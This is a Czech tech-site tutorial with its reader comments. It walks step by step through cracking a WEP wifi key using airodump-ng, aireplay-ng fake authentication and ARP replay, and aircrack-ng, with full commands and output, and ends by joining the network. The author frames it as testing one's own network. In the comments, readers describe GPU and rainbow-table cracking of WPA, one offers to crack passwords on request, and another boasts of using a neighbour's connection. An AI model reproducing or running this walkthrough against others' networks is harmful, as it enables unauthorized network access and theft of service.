    U hackování WEP s OPN autentizací použijeme metodu Arp replay, jež umožní získání dostatečného množství inicializačních vektorů (dále jen IV) k prolomení hesla. Metoda je založena na generování ARP packetů a jejich zasílání na AP (což je nejvíce efektivní způsob jak donutit AP generovat nové IV). Ten nám bude odpovídat novými ARP packety s novými IV. Díky zachycení dostatečného množství IV jsme schopni získat heslo pro přístup do sítě.

    WEP PRAXE

    Útok na síť se zabezpečením WEP


    Kroky 1) a 2) jsou identické jako u metody pro crack WPA. Tedy přepnutí karty do "monitor módu" a změna MAC adresy.

    3) Zapneme skenování sítí a uděláme si tak přehled o tom, které sítě jsou dostupné a zároveň získáme potřebné údaje pro útok. Z zobrazených sítí jsem si vybral mou síť s ESSID "Mikrotik". Při skenování můžeme použít přepínač -t s parametrem WEP, díky tomu se nám zobrazí jen sítě s WEP zabezpečením. Problémy s MAC filteringem jsem nastínil v kapitole o crackování WPA, dále tedy MAC filtering nebudu uvažovat. Nebudu zde rozepisovat co znamená která položka z následujícího výpisu, to je pěkně popsáno na webu aircracku.
    root@bt:~# airodump-ng mon0 -t WEP
    
    CH  6 ][ Elapsed: 1 min ][ 2012-06-03 11:33                                         
                                                                                                                                                                
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID   
                                                                                                                                                                
     xx:xx:xx:xx:xx:F9  -15      288        0    0   1  54e. WEP  WEP  	mikrotik	       
     xx:xx:xx:xx:xx:xx  -59      277        0    0   5  54   WEP  WEP       xxxxxxxxxx  
                                                                                
                                                                                                                                                                 
     BSSID              STATION            PWR   Rate    Lost  Packets Probes 
                                                                                                                                                                 
                
     xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -16    9e- 1      0       31 mikrotik 
     xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -78   54 - 1      0      145 xx:xx:xx:xx:xx:xx 
    
    4) V tomto kroku zachytíme potřebná data, z nichž nakonec získáme IV nutné pro získání hesla. Z výpisu z předešlého kroku můžeme vidět, že síť "Mikrotik" je na 1. kanálu a AP má BSSID xx:xx:xx:xx:xx:F9. Zachycená data uložíme do souboru mikrotik.cap. Pro to abychom byli schopni získat heslo je třeba zachytit dostatečné množství dat (viz. položka #Data). Nelze říci kolik přesně - různé zdroje uvádí různé údaje(obecně, čím více tím lépe). V mém případě stačilo kolem 10000. Pokud však na síti není žádný provoz, tak nemáme možnost je zachytit. Jediná možnost je vytvořit provoz uměle, viz. další kroky.
    root@bt:~# airodump-ng -c 1 -w mikrotik.cap --bssid xx:xx:xx:xx:xx:F9 mon0
    
    CH  1 ][ Elapsed: 16 s ][ 2012-06-03 11:44                                         
                                                                                                                                                                
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                                
     xx:xx:xx:xx:xx:F9   -5 100      161        7    0   1  54e. WEP  WEP         mikrotik    
                                                                                                                                                                
     BSSID              STATION            PWR   Rate    Lost  	Packets  Probes 
                                                                                                                                                                
     xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -15    0 -54e     0        6    	 mikrotik
    5) V tomto kroku provedeme falešnou autentizaci a následně asociaci. Díky tomu budeme moci v následujících krocích vytvořit datový provoz, který zachytíme a získáme z něj potřebné heslo. Z výpisu vidíme, že autentizace a asociace proběhla úspěšně.
    root@bt:~# aireplay-ng -1 0 -a xx:xx:xx:xx:xx:F9 mon0
    
    No source MAC (-h) specified. Using the device MAC (00:11:22:33:44:55)
    11:47:19  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:F9) on channel 1
    
    11:47:19  Sending Authentication Request (Open System) [ACK]
    11:47:19  Authentication successful
    11:47:19  Sending Association Request [ACK]
    11:47:19  Association successful :-) (AID: 1)
    6) V tomto kroku útokem arp replay generujeme velké množství paketů - vzniká tak datový provoz (viz. výstup příkazu). Přepínačem -3 volíme právě arp replay attack.
    root@bt:~# aireplay-ng -3 -b xx:xx:xx:xx:xx:F9 mon0
    
    No source MAC (-h) specified. Using the device MAC (00:11:22:33:44:55)
    12:33:41  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:F9) on channel 1
    Saving ARP requests in replay_arp-0603-123341.cap
    You should also start airodump-ng to capture replies.
    ^Cad 51384 packets (got 19078 ARP requests and 13785 ACKs), sent 15930 packets...(500 pps)
    V okně, kde nám běží airdump-ng, můžeme vidět velký nárůst přenášených packetů v položce data, něco jako násl. výstup.
    CH 11 ][ Elapsed: 2 mins ][ 2012-06-03 12:35                                         
                                                                                                                                                               
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                               
     xx:xx:xx:xx:xx:F9  -15  63     1212    15280  586  11  54   WEP  WEP    OPN  mikrotik 
                                                                                                                                                               
     
    BSSID              STATION            PWR   Rate    Lost  Packets 	Probes 
                                                                                                                                                               
     xx:xx:xx:xx:xx:F9  00:11:22:33:44:55   -10    0 - 1   10420 29215  	 mikrotik
     xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -15    0 -54e     0        6    	 mikrotik
    7) V následujícím kroku spustíme program aircrack-ng, kterému předáme soubor se zachycenými daty. Výsledkem je zachycená passphrase, kterou následně použijeme k připojení se do sítě.
    root@bt:~# aircrack-ng -b xx:xx:xx:xx:xx:F9 mikrotik.cap-01.cap 
    
    Opening mikrotik.cap-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 11837 ivs.
    
    
    
                                                                           Aircrack-ng 1.1 r1899
    
    
                                                           [00:00:00] Tested 554 keys (got 11785 IVs)
    
       KB    depth   byte(vote)
        0    1/  6   08(16384) DB(16384) 6A(15616) 72(15616) 7C(15616) 3A(15104) AD(15104) 49(14848) 70(14848) FE(14848) 09(14592) 1E(14592) 
        1    8/ 10   A1(15104) 5C(15104) 4F(14848) 77(14848) B5(14848) D5(14848) DE(14848) 9A(14592) C4(14592) 10(14336) 4C(14336) 50(14336) 
        2    1/  3   BD(15872) 1B(15616) 46(15616) 4B(15616) 8F(15616) E0(15616) 06(15360) 07(15360) 44(15360) 78(15104) 93(15104) 99(15104) 
        3    0/  4   3F(17408) 32(16640) 65(16640) 24(16384) 05(15872) A6(15872) F5(15872) DC(15616) 44(15104) 22(14848) 77(14848) 58(14592) 
        4    0/  1   C5(17664) B1(16384) 3D(15360) 78(15360) DB(15360) 07(15104) 85(15104) 6C(14848) 9A(14848) C1(14848) E3(14848) 0A(14592) 
    
                             KEY FOUND! [ 01:23:45:67:89 ] 
    	Decrypted correctly: 100%
    
    
    8) V posledním kroku se přihlásíme do sítě pomocí získané passphrase a programu dhclient jež už určitě nemusím představovat.
    machine:user:~$ sudo iwconfig wlan0 essid mikrotik
    machine:user:~$ sudo iwconfig wlan0
    
    wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
              Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm   
              Retry  long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:0123-4567-89
              Power Management:off
    
    
    machine:user:~$ sudo iwconfig wlan0 key 0123456789
    machine:user:~$ sudo iwconfig wlan0
    
    wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
              Mode:Managed  Frequency:2.437 GHz  Access Point: xx:xx:xx:xx:xx:F9   
              Bit Rate=1 Mb/s   Tx-Power=15 dBm   
              Retry  long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:0123-4567-89
              Power Management:off
              Link Quality=62/70  Signal level=-48 dBm  
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:4   Missed beacon:0
    
    
    machine:user:~$ sudo dhclient -v wlan0 
    
    Internet Systems Consortium DHCP Client 4.1.1-P1
    Copyright 2004-2010 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    
    Listening on LPF/wlan0/00:11:22:33:44:55
    Sending on   LPF/wlan0/00:11:22:33:44:55
    Sending on   Socket/fallback
    DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 5
    DHCPOFFER from 192.168.0.1
    DHCPREQUEST on wlan0 to 255.255.255.255 port 67
    DHCPACK from 192.168.0.1
    Reloading /etc/samba/smb.conf: smbd only.
    bound to 192.168.0.33 -- renewal in 232699 seconds.
    

    ZÁVĚR

    Co napsat závěrem...? Přiznám se, že neznám principy použitých technik až do detailu, tudíž jsou některé části popsány poměrně stroze, řekl bych místy snad až nepřesně. Přesto však doufám, že podle výše popsaného návodu budete schopni ověřit si zabezpečení vlastní sítě. Snad jsem alespoň v hrubých obrysech vysvětlil jak principy hackování sítí fungují. Techniky, které jsem použil jsou jedny z mnoha možných. Pokud máte zájem testovat další techniky, odkážu Vás na manuálové stránky použitých programů. Pokud někdo použije uvedené techniky na prolomení hesla do cizí sítě, činí to samozřejmě na vlastní riziko:)
    Byl bych rád za konstruktivní kritiku. Pokud najdete chyby, napište do diskuze. Chyby v článku opravím. Good luck!        

    Hodnocení: 95 %

            špatnédobré        

    Anketa

    Jaký je váš názor na tento článek o hackingu wifi?
     (89 %)
     (11 %)
    Celkem 105 hlasů

    Obrázky

    Hacking WiFi, obrázek 1 Hacking WiFi, obrázek 2

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    9.6.2012 18:59 Dejv | skóre: 37 | blog: Jak ten blog nazvat ... ? | Ostrava
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Hm, jeste by to chtelo si ujasnit pojmy hacking a cracking. Necetl jsem to cele, jen par uvodnich odstavcu, ale jestli jsem to spravne pochopil, jde o to, jak se dostat do (zde sice vlastni, ale to je jedno) site. Cili jde o prolomeni zabezpeceni cili crackovani. Viz http://cs.wikipedia.org/wiki/Hacking
    Pevně věřím, že zkušenější uživatelé mě s mými nápady usměrní a pošlou tam, kam tyto nápady patří...
    9.6.2012 19:18 gfsdg
    Rozbalit Rozbalit vše Re: Hacking WiFi
    chybi ti tam wps, s tim je taky docela prdel obcas
    9.6.2012 19:51 hacup | skóre: 8
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Jak velký wordlist ti stačil k prolomeni. Zkoušel jsem 50MB velký a bylo to dost marný.
    Bystroushaak avatar 9.6.2012 22:13 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Heh. Přece tak velký, aby obsahoval i zadané heslo.
    9.6.2012 22:58 Kvakor
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Záleží na typu, ty nejmenší jsou jen seznam "oblíbených" hesel, větši obsahují celý slovník příslušného jazyka včetně běžných jmen, ty rozsáhlé přidávají další jména (z historie, z literatury, filmů ...), názvy ze zeměpisu, geologie, astronomie, fyziky, chemie, biologie ... Ty opravdu velké mají to samé ve více jazycích (včetně těch vymyšlených a různých verzí přepisů do latinky) a mišmaš ze všeho možného od názvů planet z Hvězdných válek po jména všech Pokémonů :-)
    Doporučuji přečíst Trestní zákoník, Část druhá, Hlava V, § 230 - 232.

    Samozřejmě si dělám si srandu, super článek :) Bohužel na mém HW to nefunguje...

    Zajímavý je také ARP spoofing, umožňuje jednoduše odposlouchávat a provádět man-in-the-middle na WiFi síti, ke které jsem přihlášen. Funguje prakticky na všech WiFinách, jaké to používá šifrování (WEP, WPA, ...) je jedno.
    9.6.2012 20:14 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Doporučuji přečíst Trestní zákoník, Část druhá, Hlava V, § 230 - 232.
    Hned jak jsem viděl tuto větu, podíval jsem se na jméno pisatele v hrozivém očekávání :-D
    9.6.2012 21:38 w4rr10r
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Blbec jako blbec.
    9.6.2012 20:25 jestemmyfilantropami
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Zajímavé,mnozí zde volají po tom, ať si každý slušný člověk může zastřelit svého narušitele na soukromém pozemku,soudobý antikomunista je mravně otřesen potlačováním svobody jednotlivce,jeho práva na ochranu soukromí, listovní tajemství etc.za bývalé totality, a ejhle,hacker šmírovat a krást na cizím smí.Důkazy o jeho hackerské schopnosti si naopak zaslouží uznání.
    9.6.2012 22:01 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Sice se říká "nekrmte trolly". Ale dovolím si upozornit, že stejně jako fakt že někdo ví jak si otevřít zamčené dveře z něj nedělá zloděje nebo z člověka co ví jak někoho jiného zabít (což je IMO každý svéprávný člověk) to nedělá vraha tak ani znalost slabin počítačových systému a sítí z nikoho nedělá crackera.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Trollovi jde jenom o provokaci, coz neni tento pripad.
    9.6.2012 23:19 jestemmyfilantropami
    Rozbalit Rozbalit vše Re: Hacking WiFi
    +1 :)
    9.6.2012 23:17 jestemmyfilantropami
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Sice se říká "nekrmte trolly"
    Já jsem dobrej troll.
    ...znalost slabin...z nikoho nedělá
    Ale je to velké pokušení,ukázat slabšímu, kde je jeho místo,že,Mrkvo? Taky to děláš,ty trolle:).

    gtz avatar 9.6.2012 20:40 gtz | skóre: 27 | blog: gtz | Brno
    Rozbalit Rozbalit vše Re: Hacking WiFi
    No v jedné firmě kamarád řešil stále útoky na jejich WLAN, nakonec se vše vyřešilo použít WLAN routerů CISCO. Tedy WPA2 PSK, filtrování MAC adres včetně detekce duplicit MAC adres. Nastavovalo se to tam celkem agresivně (zahodily se obě adresy a daly se do blacklistu). No později se zjistilo, že tyto aktivity měly na svědomí žáci s nedaleké SPŠE.
    - nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
    vlastikroot avatar 9.6.2012 23:39 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Security trough obscurity. Nechapu snahy v zabezpecovani wifi siti ... spravne by skrz wifi sit (a ani pres ethernet) nemelo byt bez dalsiho overovani dostupneho nic duleziteho. Pak muze byt kazdemu jedno, kdyz se tam nekdo dostane (z jakehokoli duvodu, kdyby ho dotycny nemel, tak to asi nedela). Nechci obhajovat zlodeje internetoveho pripojeni, ale v pripade zaku te skoly bych tipoval ze je na vine stav wifi skoly (jestli vubec nejakou maji). Kdyby meli vlastni poradnou, tak to nehackuji.
    We will destroys the Christian's legion ... and the cross, will be inverted
    David Watzke avatar 10.6.2012 00:23 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Uvědomuješ si, že někdo může např. dělat chlípnosti pod IP adresou, která je vedená jako tvoje? Pokud je podle tebe v pořádku, aby se někdo mírnix týrnix připojoval k jakýkoliv wifině se mu zlíbí, tak seš teda pěknej exot.
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    vlastikroot avatar 10.6.2012 01:43 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Pochybuju ze nekdo bude na moji IP delat vetsi chlipnosti nez ja sam :-D Ale o to nejde ... spis jsem tim myslel ten MAC filter s blocklistovanim duplicit. Pokud bych si pres GPU akcelerovanej WPA cracker zjistil heslo z odposlouchanych handshaku, tak pokud by me to nepustilo s nahodnou MAC, zkousel bych MAC odchycenych paketu. V tomhle pripade by to teda zablokovalo nekolik pravoplatnych klientu (tohle samy delali spoluzaci pres windows login, proste se za ucitele prihlasili s 5x spatnym heslem a ucitel se tam hodinu nedostal). Misto bezproblemoveho (pro ostatni klienty) pouziti cizi wifi je nechteny DoS. Bezpecnost site podle me nespociva v nemoznosti se k siti pripojit (co by napr. udelal clovek s ethernet kabelem uvnitr firmy). Od bezpecnosti jsou firewally, autentifikace jednotlivych protokolu, oddeleni kritickych casti site (napr. patro plne windows masin, wifina, serverovna, vyrobni linka atd.).
    We will destroys the Christian's legion ... and the cross, will be inverted
    gtz avatar 10.6.2012 14:53 gtz | skóre: 27 | blog: gtz | Brno
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Vnitřní síť po firmě je dlouho postavená na CISCO a je klid. Toto se dělo na síti co je venku pro účely IP kamer a možného přístupu návštěvníků na net. Tehdy se zjistilo odkud šly pokusy o hacking a nic se s tím nedělalo. Tehdy v tu dobu vyšel v chipu článek právě na toto téma a děcka to prostě asi zkoušely.
    - nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
    10.6.2012 09:32 David Jaša | skóre: 44 | blog: Dejvův blog
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Dát tam WPA enterprise (klidně s jedním statickým jménem a heslem pro všechny), mají pokoj.
    9.6.2012 21:58 Dirka | skóre: 15 | blog: dirka12345
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Takza na wpa2/psk neexistuje neslovnikovej utok nebo je mozna jina metoda? Generuju si samo fraze jako "dirkajekillaAvelKEJzabijakjakozeJOJO##zweimal!aidreimalpico%" tak jak moc se mam o to starat. Ma smysl cim delsi fraze tim lip, nebo po uricte delce uz je to jen onanie a stejne se to truncatne resp bude kolize s jinym kratsim?
    9.6.2012 23:05 Kvakor
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Pokud šifra nemá slabé místo, tak je jedinou možností (mimo brute-force) útok přes slovník. U délky hesla záleží, jakou další funkcí se prožene, ale obecně jedno písmeno je cca. 5 bitů. Pokud chce mít člověk opravdu jistotu, tak použije generované binární/hexadecimální heslo (nejlépe opravdu náhodným zdrojem), protože takové by mělo být odolné i proti slovníkovýnm útokům (tedy pokud útočník náhodou netrefí něco, z čeho vyleze stejný hash).
    the.max avatar 9.6.2012 23:46 the.max | skóre: 46 | blog: Smetiště
    Rozbalit Rozbalit vše Re: Hacking WiFi
    kdysi jsem jako pro WPA2-PSK pouzival product key z win:-D
    KERNEL ULTRAS Fan Team || Sabaton - nejlepší učitel dějepisu || Gentoo - dokud nás systemd nerozdělí.
    vlastikroot avatar 10.6.2012 01:47 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Staci dost silnej cluster osazenej dostatecnym poctem vykonych GPU. Pak je na vyber rada programu napr. pyrit. Dpkad nebyla GPU akcelerace, tak bylo WPA docela bezpecny, ale dneska se podle me na bezpecnost wifi neda spolehnout nikdy.
    We will destroys the Christian's legion ... and the cross, will be inverted
    10.6.2012 09:40 David Jaša | skóre: 44 | blog: Dejvův blog
    Rozbalit Rozbalit vše Re: Hacking WiFi
    s/WPA/WPA-PSK/
    Bedňa avatar 10.6.2012 05:17 Bedňa | skóre: 34 | blog: Žumpa | Horňany
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Na prelomenie WEP sú už dnes pekné klikátka a WPA sa pri dobrom hesle nedá zlomiť, teda určite nie pokiaľ nevlastníme doma superpočítač za milóny dolárov.
    KERNEL ULTRAS video channel >>>
    10.6.2012 15:51 r00t
    Rozbalit Rozbalit vše Re: Hacking WiFi
    WPA a WPA2 crackujem na Radeon HD 7750 1024DDR5 PCI 3.0 cez noc...
    polo23 avatar 10.6.2012 16:15 polo23 | skóre: 28 | blog: polo23
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Mohl bys uvest nejaky zdroj jak na to. Celkem by me zajimalo jak ke crackovani vyuzit GPU. Pouzivas slovnikovy utok a nebo bruteforce?
    Jendа avatar 10.6.2012 16:17 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Hacking WiFi
    I když si jako heslo nastavím jméno svého pejska (ZeHM3TxrroI)?
    10.6.2012 17:16 r00t
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Pouzivam viacere tooly (najviac Pyrit resp. Pyrit w/ CoWPAtty ) staci mat dost rainbow tabuliek (cca 1TB) a slovnikov (400GB asi 12 jazykov + specialne + uz najdene (vlastne/cudzie)). Heslo do 8 alfanumerickych znakov zvladam do 48 hodin.
    10.6.2012 18:01 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Co heslo typu "I don't want to be the fool once more, how could I ever think that I can win?" nebo obecně pár slov z textu nějaké oblíbené písničky? Na to rainbow tabulky a slovníky taky moc nejsou.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    10.6.2012 18:55 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Hacking WiFi
    A co heslo obsahující skoro 20 [:print:] znaků + neobvyklé SSID?
    polo23 avatar 10.6.2012 19:34 polo23 | skóre: 28 | blog: polo23
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Vsak on tam pise, ze prolomi heslo o 8 znacich.Takze pokud ma vice znaku tak by ho prolomil jen kdyby melo stejny hash jako nejake z tech 8 znakovych hesel.
    Bedňa avatar 10.6.2012 22:45 Bedňa | skóre: 34 | blog: Žumpa | Horňany
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Alebo:

    Dobro je prisjetiti se da prividno prav prut prema cilju predstavja u stvari pravodlivo krivudanje.
    KERNEL ULTRAS video channel >>>
    11.6.2012 12:45 Honza
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Ahoj, dalo by se s tebou domluvit nejak na prolomeni hesla?
    11.6.2012 13:46 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Hrome, rychle, kde je to červený tlačítko od IWF :-D
    11.6.2012 14:07 r00t
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Aky typ hesla?
    kotyz avatar 11.6.2012 16:11 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Hacking WiFi
    heslo1234 :-D
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    Bedňa avatar 13.6.2012 12:52 Bedňa | skóre: 34 | blog: Žumpa | Horňany
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Moc dlhé, hardcore security používajú nbu123
    KERNEL ULTRAS video channel >>>
    13.6.2012 20:19 r00t
    Rozbalit Rozbalit vše Re: Hacking WiFi
    sa smejes, ale bolo to nbusr123... a nieje to vobec az tak lahke heslo - ti ludia ho necrackli ale nasli v mailovej (nekryptovanej!) korespondencii...
    polo23 avatar 11.6.2012 19:58 polo23 | skóre: 28 | blog: polo23
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Ahoj, myslim, ze by bylo prinosnejsi kdybys treba napsal jake distro pouzivas, jaky ovladac pro gpu atd. Me by treba zajimaly ty tvoje rainbow tables. To jsi vybral mnozinu znaku, vytvoril kombinace o delce 8 znaku a zhasoval je? A tim ti vznikla 1TB rainbow tabulka? Ta tabulka je ale platna jen pro konkretni essid ne? Pokud se essid zmeni tak ta tabulka je pak k nicemu ne?
    vlastikroot avatar 13.6.2012 19:48 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Co kdyz si puvodni provozovatel zvoli jine heslo? Pak je rainbow table lepsi nez znovu bruteforce.
    We will destroys the Christian's legion ... and the cross, will be inverted
    12.6.2012 15:18 Honza
    Rozbalit Rozbalit vše Re: Hacking WiFi
    WPA2/PSK
    Petr Tomášek avatar 13.6.2012 23:06 Petr Tomášek | skóre: 39 | blog: Vejšplechty
    Rozbalit Rozbalit vše Re: Hacking WiFi

    Cool. Jenomze kolega ma heslo o 11 znacich, tj. o 3 znaky delsi, nez to tvoje 8mi-znakove. Jestlize jeden znak dava baj woko 5 bitu, pak to znamena, ze takoveto heslo budes zvladat priblizne za 2^(3*5)*2 dni = zhruba 179 let.

    Prijemnou zabavu! :-)

    multicult.fm | monokultura je zlo | welcome refugees!
    stativ avatar 10.6.2012 10:43 stativ | skóre: 54 | blog: SlaNé roury
    Rozbalit Rozbalit vše Re: Hacking WiFi
    V anketě ti schází možnost „Konečně srozumitelný návod na hacking wifi, zkoušet ho ale nebudu.“
    Ať sežeru elfa i s chlupama!!! ljirkovsky.wordpress.com stativ.tk
    22.4.2013 14:09 jarda
    Rozbalit Rozbalit vše Re: Hacking WiFi
    To je moc slozity...nejsem uplnej hlupak,ale tohle mi prijde jednodussi...nevim.. http://www.wepcrack.org/download.html
    14.6.2013 23:26 babyHCK
    Rozbalit Rozbalit vše Re: Hacking WiFi
    Ou, super! Takovej fofr jsem teda necekal,holt jde videt,ze zadna ochrana neni nikdy 100%.Autorovi programku PALEC NAHORU.Jedu na souseda uz druhej mesic,tj cca 500,-/mesic.Objednam si za to novy notebook na splatky.Jeste jedno diiiikkkk !!!! ;-)

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.